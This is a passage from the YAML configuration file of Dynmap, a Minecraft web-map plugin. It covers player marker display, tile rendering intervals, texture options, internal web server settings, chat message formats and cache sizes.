sendbutton: false - class: org.dynmap.ClientComponent type: playermarkers showplayerfaces: true showplayerhealth: true # If true, show player body too (only valid if showplayerfaces=true showplayerbody: false # Option to make player faces small - don't use with showplayerhealth smallplayerfaces: false # Optional - make player faces layer hidden by default hidebydefault: false # Optional - ordering priority in layer menu (low goes before high - default is 0) layerprio: 0 # Optional - label for player marker layer (default is 'Players') label: "Players" #- class: org.dynmap.ClientComponent # type: digitalclock - class: org.dynmap.ClientComponent type: link - class: org.dynmap.ClientComponent type: timeofdayclock showdigitalclock: true #showweather: true # Mouse pointer world coordinate display - class: org.dynmap.ClientComponent type: coord label: "Location" hidey: false show-mcr: false show-chunk: false # Note: more than one logo component can be defined #- class: org.dynmap.ClientComponent # type: logo # text: "Dynmap" # #logourl: "images/block_surface.png" # linkurl: "http://forums.bukkit.org/threads/dynmap.489/" # # Valid positions: top-left, top-right, bottom-left, bottom-right # position: bottom-right #- class: org.dynmap.ClientComponent # type: inactive # timeout: 1800 # in seconds (1800 seconds = 30 minutes) # redirecturl: inactive.html # #showmessage: 'You were inactive for too long.' #- class: org.dynmap.TestComponent # stuff: "This is some configuration-value" # Treat hiddenplayers.txt as a whitelist for players to be shown on the map? (Default false) display-whitelist: false # How often a tile gets rendered (in seconds). renderinterval: 1 # How many tiles on update queue before accelerate render interval renderacceleratethreshold: 60 # How often to render tiles when backlog is above renderacceleratethreshold renderaccelerateinterval: 0.2 # How many update tiles to work on at once (if not defined, default is 1/2 the number of cores) tiles-rendered-at-once: 2 # If true, use normal priority threads for rendering (versus low priority) - this can keep rendering # from starving on busy Windows boxes (Linux JVMs pretty much ignore thread priority), but may result # in more competition for CPU resources with other processes usenormalthreadpriority: true # Save and restore pending tile renders - prevents their loss on server shutdown or /reload saverestorepending: true # Save period for pending jobs (in seconds): periodic saving for crash recovery of jobs save-pending-period: 900 # Zoom-out tile update period - how often to scan for and process tile updates into zoom-out tiles (in seconds) zoomoutperiod: 30 # Control whether zoom out tiles are validated on startup (can be needed if zoomout processing is interrupted, but can be expensive on large maps) initial-zoomout-validate: true # Default delay on processing of updated tiles, in seconds. This can reduce potentially expensive re-rendering # of frequently updated tiles (such as due to machines, pistons, quarries or other automation). Values can # also be set on individual worlds and individual maps. tileupdatedelay: 30 # Tile hashing is used to minimize tile file updates when no changes have occurred - set to false to disable enabletilehash: true # Optional - hide ores: render as normal stone (so that they aren't revealed by maps) #hideores: true # Optional - enabled BetterGrass style rendering of grass and snow block sides #better-grass: true # Optional - enable smooth lighting by default on all maps supporting it (can be set per map as lighting option) smooth-lighting: true # Optional - use world provider lighting table (good for custom worlds with custom lighting curves, like nether) # false=classic Dynmap lighting curve use-brightness-table: true # Optional - render specific block names using the textures and models of another block name: can be used to hide/disguise specific # blocks (e.g. make ores look like stone, hide chests) or to provide simple support for rendering unsupported custom blocks block-alias: # "minecraft:quartz_ore": "stone" # "diamond_ore": "coal_ore" # Default image format for HDMaps (png, jpg, jpg-q75, jpg-q80, jpg-q85, jpg-q90, jpg-q95, jpg-q100, webp, webp-q75, webp-q80, webp-q85, webp-q90, webp-q95, webp-q100), # Note: any webp format requires the presence of the 'webp command line tools' (cwebp, dwebp) (https://developers.google.com/speed/webp/download) # # Has no effect on maps with explicit format settings image-format: jpg-q90 # If cwebp or dwebp are not on the PATH, use these settings to provide their full path. Do not use these settings if the tools are on the PATH # For Windows, include .exe # #cwebpPath: /usr/bin/cwebp #dwebpPath: /usr/bin/dwebp # use-generated-textures: if true, use generated textures (same as client); false is static water/lava textures # correct-water-lighting: if true, use corrected water lighting (same as client); false is legacy water (darker) # transparent-leaves: if true, leaves are transparent (lighting-wise): false is needed for some Spout versions that break lighting on leaf blocks use-generated-textures: true correct-water-lighting: true transparent-leaves: true # ctm-support: if true, Connected Texture Mod (CTM) in texture packs is enabled (default) ctm-support: true # custom-colors-support: if true, Custom Colors in texture packs is enabled (default) custom-colors-support: true # Control loading of player faces (if set to false, skins are never fetched) #fetchskins: false # Control updating of player faces, once loaded (if faces are being managed by other apps or manually) #refreshskins: false # Customize URL used for fetching player skins (%player% is macro for name) skin-url: "http://skins.minecraft.net/MinecraftSkins/%player%.png" # Control behavior for new (1.0+) compass orientation (sunrise moved 90 degrees: east is now what used to be south) # default is 'newrose' (preserve pre-1.0 maps, rotate rose) # 'newnorth' is used to rotate maps and rose (requires fullrender of any HDMap map - same as 'newrose' for FlatMap or KzedMap) compass-mode: newnorth # Triggers for automatic updates : blockupdate-with-id is debug for breaking down updates by ID:meta # To disable, set just 'none' and comment/delete the rest render-triggers: - blockupdate #- blockupdate-with-id #- lightingupdate - chunkpopulate - chunkgenerate #- none # Title for the web page - if not specified, defaults to the server's name (unless it is the default of 'Unknown Server') #webpage-title: "My Awesome Server Map" # The path where the tile-files are placed. tilespath: web/tiles # The path where the web-files are located. webpath: web # The path were the /dynmapexp command exports OBJ ZIP files exportpath: export # The network-interface the webserver will bind to (0.0.0.0 for all interfaces, 127.0.0.1 for only local access). # If not set, uses same setting as server in server.properties (or 0.0.0.0 if not specified) #webserver-bindaddress: 0.0.0.0 # The TCP-port the webserver will listen on. webserver-port: 8123 # Maximum concurrent session on internal web server - limits resources used in Bukkit server max-sessions: 30 # Disables Webserver portion of Dynmap (Advanced users only) disable-webserver: false # Enable/disable having the web server allow symbolic links (true=compatible with existing code, false=more secure (default)) allow-symlinks: true # Enable login support login-enabled: false # Require login to access website (requires login-enabled: true) login-required: false # Period between tile renders for fullrender, in seconds (non-zero to pace fullrenders, lessen CPU load) timesliceinterval: 0.0 # Maximum chunk loads per server tick (1/20th of a second) - reducing this below 90 will impact render performance, but also will reduce server thread load maxchunkspertick: 200 # Progress report interval for fullrender/radiusrender, in tiles. Must be 100 or greater progressloginterval: 100 # Parallel fullrender: if defined, number of concurrent threads used for fullrender or radiusrender # Note: setting this will result in much more intensive CPU use, some additional memory use. Caution should be used when # setting this to equal or exceed the number of physical cores on the system. #parallelrendercnt: 4 # Interval the browser should poll for updates. updaterate: 2000 # If nonzero, server will pause fullrender/radiusrender processing when 'fullrenderplayerlimit' or more users are logged in fullrenderplayerlimit: 0 # If nonzero, server will pause update render processing when 'updateplayerlimit' or more users are logged in updateplayerlimit: 0 # Target limit on server thread use - msec per tick per-tick-time-limit: 50 # If TPS of server is below this setting, update renders processing is paused update-min-tps: 18.0 # If TPS of server is below this setting, full/radius renders processing is paused fullrender-min-tps: 18.0 # If TPS of server is below this setting, zoom out processing is paused zoomout-min-tps: 18.0 showplayerfacesinmenu: true # Control whether players that are hidden or not on current map are grayed out (true=yes) grayplayerswhenhidden: true # Set sidebaropened: 'true' to pin menu sidebar opened permanently, 'pinned' to default the sidebar to pinned, but allow it to unpin #sidebaropened: true # Customized HTTP response headers - add 'id: value' pairs to all HTTP response headers (internal web server only) #http-response-headers: # Access-Control-Allow-Origin: "my-domain.com" # X-Custom-Header-Of-Mine: "MyHeaderValue" # Trusted proxies for web server - which proxy addresses are trusted to supply valid X-Forwarded-For fields trusted-proxies: - "127.0.0.1" - "0:0:0:0:0:0:0:1" joinmessage: "%playername% joined" quitmessage: "%playername% quit" spammessage: "You may only chat once every %interval% seconds." # format for messages from web: %playername% substitutes sender ID (typically IP), %message% includes text webmsgformat: "&color;2[WEB] %playername%: &color;f%message%" # Control whether layer control is presented on the UI (default is true) showlayercontrol: true # Enable checking for banned IPs via banned-ips.txt (internal web server only) check-banned-ips: true # Default selection when map page is loaded defaultzoom: 0 defaultworld: world defaultmap: flat # (optional) Zoom level and map to switch to when following a player, if possible #followzoom: 3 #followmap: surface # If true, make persistent record of IP addresses used by player logins, to support web IP to player matching persist-ids-by-ip: true # If true, map text to cyrillic cyrillic-support: false # Messages to customize msg: maptypes: "Map Types" players: "Players" chatrequireslogin: "Chat Requires Login" chatnotallowed: "You are not permitted to send chat messages" hiddennamejoin: "Player joined" hiddennamequit: "Player quit" # URL for client configuration (only need to be tailored for proxies or other non-standard configurations) url: # configuration URL #configuration: "up/configuration" # update URL #update: "up/world/{world}/{timestamp}" # sendmessage URL #sendmessage: "up/sendmessage" # login URL #login: "up/login" # register URL #register: "up/register" # tiles base URL #tiles: "tiles/" # markers base URL #markers: "tiles/" # Snapshot cache size, in chunks snapshotcachesize: 500 # Snapshot cache uses soft references (true), else weak references (false) soft-ref-cache: true # Player enter/exit title messages for map markers # # Processing period - how often to check player positions vs markers - default is 1000ms (1 second) #enterexitperiod: 1000 # Title message fade in time, in ticks (0.05 second intervals) - default is 10 (1/2 second) #titleFadeIn: 10 # Title message stay time, in ticks (0.05 second intervals) - default is 70 (3.5 seconds) #titleStay: 70 # Title message fade out time, in ticks (0.05 seocnd intervals) - default is 20 (1 second) #titleFadeOut: 20 # Enter/exit messages use on screen titles (true - default), if false chat messages are sent instead #enterexitUseTitle: true # Set true if new enter messages should supercede pending exit messages (vs being queued in order), default false #enterReplacesExits: true # Set to true to enable verbose startup messages - can help with debugging map configuration problems # Set to false for a much quieter startup log verbose: false # Enables debugging. #debuggers: # - class: org.dynmap.debug.LogDebugger # Debug: dump blocks missing render data dump-missing-blocks: false